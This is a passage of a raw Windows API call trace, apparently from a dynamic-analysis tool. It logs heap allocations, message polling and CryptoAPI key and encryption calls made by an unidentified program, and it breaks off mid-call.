Flags=0x0, Size=0x4) returned 0x9c2748 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.640] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14cae) returned 0xbea018 [0188.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0188.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14cae) returned 0xa73cc0 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0188.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.645] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.646] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.646] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.647] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0188.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.649] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.650] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.651] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0188.651] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.651] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.651] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.651] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.652] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.652] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.652] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.652] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.652] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.652] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.652] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.652] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.659] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.660] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.660] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.660] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14cae, dwBufLen=0x0 | out: pbData=0x0*, 